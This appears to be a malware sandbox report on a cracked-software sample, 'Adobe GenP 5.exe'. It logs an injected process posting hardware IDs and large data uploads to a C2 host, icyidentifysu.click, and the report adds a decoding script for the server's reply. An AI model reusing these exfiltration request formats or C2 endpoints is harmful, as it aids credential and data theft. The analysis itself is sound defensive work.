2024-12-24 01:56:35 UTC | 1369 | IN | Data Raw: 52 31 6e 74 42 31 6a 43 66 51 4b 4f 45 79 69 46 52 4d 73 62 4c 4f 75 6e 51 50 72 30 30 62 33 69 49 47 48 57 6e 56 46 4f 4a 7a 47 55 43 65 74 48 58 55 4a 74 55 6c 79 44 4f 70 57 41 54 35 72 31 63 44 70 57 37 6d 47 45 71 6e 4e 6a 34 74 73 4e 6c 68 30 79 4a 4d 49 57 59 46 49 4c 6b 66 38 54 58 59 50 72 42 74 58 4d 6d 79 7a 78 34 39 4a 74 49 64 64 37 35 61 50 32 6b 30 2b 52 58 2b 45 71 31 41 6e 70 78 31 31 43 63 64 4a 62 68 44 72 51 77 5a 77 43 75 6a 35 79 56 75 77 6c 77 44 6e 6c 4e 37 50 41 32 30 42 4e 6f 53 51 44 79 66 6e 44 58 38 53 70 78 6b 33 54 72 35 4b 57 53 52 73 2f 62 36 58 43 2f 44 41 41 2b 65 43 33 6f 35 4e 4f 46 4a 37 79 70 63 4d 64 62 6c 65 4f 30 71 31 64 46 34 37 34 56 67 53 4d 79 76 56 77 4f 35 53 72 6f 30 65 6f 4f 53 67 2f 6c 49 79 51 7a 72 69
Data Ascii: R1ntB1jCfQKOEyiFRMsbLOunQPr00b3iIGHWnVFOJzGUCetHXUJtUlyDOpWAT5r1cDpW7mGEqnNj4tsNlh0yJMIWYFILkf8TXYPrBtXMmyzx49JtIdd75aP2k0+RX+Eq1Anpx11CcdJbhDrQwZwCuj5yVuwlwDnlN7PA20BNoSQDyfnDX8Spxk3Tr5KWSRs/b6XC/DAA+eC3o5NOFJ7ypcMdbleO0q1dF474VgSMyvVwO5Sro0eoOSg/lIyQzri


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49742 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:36 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=N3WY1YHRYDY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12800
Host: icyidentifysu.click
2024-12-24 01:56:36 UTC | 12800 | OUT | Data Raw: 2d 2d 4e 33 57 59 31 59 48 52 59 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37 0d 0a 2d 2d 4e 33 57 59 31 59 48 52 59 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 33 57 59 31 59 48 52 59 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 0d 0a 2d 2d 4e 33 57 59 31 59 48 52 59 44
Data Ascii: --N3WY1YHRYDYContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--N3WY1YHRYDYContent-Disposition: form-data; name="pid"2--N3WY1YHRYDYContent-Disposition: form-data; name="lid"LPnhqo--iycpjnafscfz--N3WY1YHRYD
2024-12-24 01:56:37 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 01:56:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ql5a99gjksfb1811mrdf97tfcb; expires=Fri, 18 Apr 2025 19:43:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSg2av0U1i3ZcWuabVi6Un7A2yHgC6XZkXQCLbdhXZW1ENzsYMDlkiF4Kvc%2Bn8TKUzr0zJlMx4BeUeStsCZXM6U62v5v11ju7Hnuy7s0%2Byi9P8dNZPRi4UtHuWqg%2Fq3IdKOwdmPF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6cf9d1def943ac-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1632&rtt_var=676&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2851&recv_bytes=13736&delivery_rate=1789215&cwnd=181&unsent_bytes=0&cid=26cde17b9a0debe9&ts=905&x=0"
2024-12-24 01:56:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 01:56:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49748 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:39 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=J8WBJ6Q0JD8R2E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15060
Host: icyidentifysu.click
2024-12-24 01:56:39 UTC | 15060 | OUT | Data Raw: 2d 2d 4a 38 57 42 4a 36 51 30 4a 44 38 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37 0d 0a 2d 2d 4a 38 57 42 4a 36 51 30 4a 44 38 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 38 57 42 4a 36 51 30 4a 44 38 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 0d 0a 2d 2d 4a
Data Ascii: --J8WBJ6Q0JD8R2EContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--J8WBJ6Q0JD8R2EContent-Disposition: form-data; name="pid"2--J8WBJ6Q0JD8R2EContent-Disposition: form-data; name="lid"LPnhqo--iycpjnafscfz--J
2024-12-24 01:56:42 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 01:56:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mds9a06828fm4i1jiio6cnjgv5; expires=Fri, 18 Apr 2025 19:43:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJ03MU0AQEXvRg7UETlddJFBZiT5YdhH4zWvumG9qL0ZszM9M1CjIj%2FS3wRSCiHlFi5Ne8lJGoCn4HK3ZtfzrBBCPUcGf%2BGlmB0pC8VkRzoH4MkyuMgwpDbnXNMcEU64DtzrjucN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6cf9e23d2e7d1a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1773&rtt_var=686&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2850&recv_bytes=15999&delivery_rate=1572428&cwnd=179&unsent_bytes=0&cid=89390947c225f14b&ts=2872&x=0"
2024-12-24 01:56:42 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 01:56:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49759 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:43 UTC | 285 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=B441WSEU0FABEAHWCE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20574
Host: icyidentifysu.click
2024-12-24 01:56:43 UTC | 15331 | OUT | Data Ascii: --B441WSEU0FABEAHWCEContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--B441WSEU0FABEAHWCEContent-Disposition: form-data; name="pid"3--B441WSEU0FABEAHWCEContent-Disposition: form-data; name="lid"LPnhqo--iycpj
2024-12-24 01:56:44 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 01:56:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kue3lgiojah014o70ni7op7bcd; expires=Fri, 18 Apr 2025 19:43:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cq8vHx62CkuU1BmDnNVVfRlnbwUhIjcwJ%2BB8VZMxwL9j%2Bm8Fy5xw7xuJOOnAKua7yB4nJgXBfAgb3BMwWy3dI8HzXkTOSoxT5kfZJLQfvmTF2Otg%2BUdWlHexq%2FiRwjlp%2FlxJtZ9D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6cf9fd2c944334-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1610&rtt_var=835&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2852&recv_bytes=21539&delivery_rate=1150512&cwnd=224&unsent_bytes=0&cid=5d8340cd3eb747ab&ts=1259&x=0"
2024-12-24 01:56:44 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 01:56:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49765 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:46 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0OLTCBLHL669ZO1XS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1251
Host: icyidentifysu.click
2024-12-24 01:56:46 UTC | 1251 | OUT | Data Ascii: --0OLTCBLHL669ZO1XSContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--0OLTCBLHL669ZO1XSContent-Disposition: form-data; name="pid"1--0OLTCBLHL669ZO1XSContent-Disposition: form-data; name="lid"LPnhqo--iycpjnaf
2024-12-24 01:56:47 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 01:56:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vdq6timams24u638mm2gvj2862; expires=Fri, 18 Apr 2025 19:43:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BPzDgpIslSGgMkIhsvqLhAvG5wEwC2J8rNmO%2FCcnIjA21Z51FN5ZNw6%2Btv8epcmmE2jsfzqXj1QoD0DY2UDdjG2%2Bcuwrc%2FLXyeHk53Wk567Z42%2BsOkZnspoUcD%2BjBiyupOcL9x9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6cfa0eeb6d4414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1623&rtt_var=615&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=2170&delivery_rate=1799137&cwnd=172&unsent_bytes=0&cid=c1c4d6a6922ab232&ts=818&x=0"
2024-12-24 01:56:47 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 01:56:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49771 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:48 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=E05V38MADA0V3M1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 592557
Host: icyidentifysu.click
2024-12-24 01:56:48 UTC | 15331 | OUT | Data Ascii: --E05V38MADA0V3M1Content-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--E05V38MADA0V3M1Content-Disposition: form-data; name="pid"1--E05V38MADA0V3M1Content-Disposition: form-data; name="lid"LPnhqo--iycpjnafscfz
2024-12-24 01:56:51 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 01:56:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=pon65kmk2kqaasivo2emp2rofe; expires=Fri, 18 Apr 2025 19:43:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quSxwXMJEkgl98HBw0KZ6qwuAfwB2iSefp2yY9njwBvKAUToA7jD2QPrUM0t6UbFefwK%2B71LVISDPQa1cj3fX3Nlj4qDO09wPrBI9OEi%2B6caiUcVMvU81hMbieHQYNa7huHcXbqL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6cfa1e7e9c6a57-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1568&rtt_var=607&sent=209&recv=618&lost=0&retrans=0&sent_bytes=2851&recv_bytes=595170&delivery_rate=1775075&cwnd=231&unsent_bytes=0&cid=eea19afd1e7a3db4&ts=2418&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49781 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:52 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 89
Host: icyidentifysu.click
2024-12-24 01:56:52 UTC | 89 | OUT | Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--iycpjnafscfz&j=&hwid=87C71F54802818CB0859257F8C965717
                                                                                  2024-12-24 01:57:00 UTC1130INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:57:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=rg2m46nflalqoh71o9haltjpvc; expires=Fri, 18 Apr 2025 19:43:39 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZtOwQbEDYPGwW4ug%2FidasgyF2APdHtRG%2FDIWCI9lzlGy53ZNiCY1VEMdfpDO4I7%2FzGpaBr0Og7X%2B23tT2vWgqsvRvewHn6QBZuRM%2BBqyRSsEhcls4b8Dpm5aAmKAUQhqL8AxDFXF"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cfa3618331a38-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1868&rtt_var=740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=992&delivery_rate=1563169&cwnd=220&unsent_bytes=0&cid=bd5acf732423012a&ts=7940&x=0"
                                                                                  2024-12-24 01:57:00 UTC54INData Raw: 33 30 0d 0a 34 53 31 56 6f 7a 6b 45 54 6c 65 6b 31 32 50 43 63 4d 2b 49 50 4a 39 73 57 57 36 67 45 59 33 49 55 41 53 5a 50 2b 51 67 6b 61 4b 36 63 41 3d 3d 0d 0a
                                                                                  Data Ascii: 304S1VozkETlek12PCcM+IPJ9sWW6gEY3IUASZP+QgkaK6cA==
                                                                                  2024-12-24 01:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0
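The response above is the only application-layer reply in this capture, and its body arrives as a single 48-byte chunk (size line `30`, hex) followed by the zero-length terminator chunk. The block below is an added example, not code from Joe Sandbox, from the sample or from the LummaC authors: it rebuilds the two `Data Raw` dumps as bytes, dechunks them as RFC 9112 describes, and base64-decodes the result, which shows that the server returned 34 raw bytes inside the base64 text. What those 34 bytes encode is not established anywhere in this report, so the example stops at the decoded length and hex rather than guessing at a format.

```python
"""Decode the chunked HTTP body captured in the sandbox report above.

Added example for this report; not Joe Sandbox code and not part of the
sample.  The two hex dumps below are copied from the report's "Data Raw"
lines (54 bytes and 5 bytes respectively).
"""
import base64
import binascii

# Copied from the report: first chunk (size line "30\r\n" + 48 bytes + CRLF).
CHUNK_1_HEX = (
    "33 30 0d 0a 34 53 31 56 6f 7a 6b 45 54 6c 65 6b 31 32 50 43 63 4d 2b 49 "
    "50 4a 39 73 57 57 36 67 45 59 33 49 55 41 53 5a 50 2b 51 67 6b 61 4b 36 "
    "63 41 3d 3d 0d 0a"
)
# Copied from the report: terminating zero-length chunk "0\r\n\r\n".
CHUNK_0_HEX = "30 0d 0a 0d 0a"


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump into raw bytes."""
    return binascii.unhexlify(dump.replace(" ", "").replace("\n", ""))


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (RFC 9112, section 7.1).

    Each chunk is '<hex-size>[;extensions]\\r\\n<data>\\r\\n'; a zero-size
    chunk ends the body (any trailer fields are ignored here).  A malformed
    or truncated stream raises ValueError instead of yielding partial data.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        size_field = body[pos:eol].split(b";", 1)[0].strip()
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            if body.find(b"\r\n", pos) < 0:
                raise ValueError("missing final CRLF after last chunk")
            return bytes(out)
        data = body[pos:pos + size]
        if len(data) != size:
            raise ValueError(f"truncated chunk: expected {size}, got {len(data)}")
        out += data
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def decode_captured_response() -> dict:
    """Dechunk the captured body and base64-decode the text it carries."""
    stream = hexdump_to_bytes(CHUNK_1_HEX) + hexdump_to_bytes(CHUNK_0_HEX)
    body = dechunk(stream)
    # validate=True rejects anything outside the base64 alphabet, so a
    # response that only looks like base64 fails here instead of later.
    payload = base64.b64decode(body, validate=True)
    return {
        "chunk_size": len(body),
        "body_ascii": body.decode("ascii"),
        "payload_len": len(payload),
        "payload_hex": payload.hex(),
    }


if __name__ == "__main__":
    for key, value in decode_captured_response().items():
        print(f"{key}: {value}")
```

Run it directly to print the decoded fields. `dechunk()` raises rather than returning a partial body, so a truncated capture fails loudly instead of silently shortening the payload you go on to analyse.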

                                                                                  Target ID:0
                                                                                  Start time:20:56:01
                                                                                  Start date:23/12/2024
                                                                                  Path:C:\Users\user\Desktop\Adobe GenP 5.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Adobe GenP 5.exe"
                                                                                  Imagebase:0xc20000
                                                                                  File size:14'820'352 bytes
                                                                                  MD5 hash:9CCE9D11869E1568A959515CD688F1F9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:20:56:26
                                                                                  Start date:23/12/2024
                                                                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                  Imagebase:0xee0000
                                                                                  File size:231'736 bytes
                                                                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                    Strings
                                                                                    • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowthird_party/swagger-ui/swagger-ui.csst, xrefs: 00C53C1B
                                                                                    • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtemplate: %s:%d: %stoo many open filesunclosed left parenunexpected %s in %sunexpected InstFailunexpected g statusunknown Go ty, xrefs: 00C53A9B
                                                                                    • %, xrefs: 00C53C24
                                                                                    • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00C53B8C
                                                                                    • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00C53B31
                                                                                    • bad g0 stackbad recoveryblock clausecaller errorcan't happencas64 failedcgo functionchan receiveclose notifycontent-typecontext.TODOdarwin/amd64darwin/arm64dumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddeco, xrefs: 00C53B0A
                                                                                    • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not, xrefs: 00C53BE7
                                                                                    • CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecan't install method/function %q with %d resultscannot use FakeImportC and go115UsesCgo togethercould not find GetSystemTimeAsFileTime() syscallfail to read symbol , xrefs: 00C53BC0
                                                                                    • VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer, xrefs: 00C53B65
                                                                                    • )*.*/*=+++-+=, ---=->.(.\/*///=/i/v00010X0b0o0s0x1;254;535;7;809;: :=:]; <-<<<==#==> >=>>??A3A4CNCcCfCoCsLlLmLoLtLuMcMeMnMuNONdNlNoNuONOUOnPcPdPePfPiPoPsR8R9STScSkSmSoTeV1V2V3V5V6XiYiZlZpZs[]")":"\$\'\(\)\*\-\.\/\0\9\?\D\E\S\W\[\"\\\]\^\a\c\d\f\n\r\s\t\w\{\|, xrefs: 00C53AEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2307376286.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2307360248.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000EC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000FBF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307973819.000000000117F000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307995567.0000000001180000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308016419.000000000118A000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308681416.00000000019DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308698146.00000000019DB000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308711580.00000000019DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308724757.00000000019DE000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E0000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019ED000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.0000000001A09000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308795286.0000000001A10000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A11000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A34000.00000002.00000001.01000000.00000003.sdmp
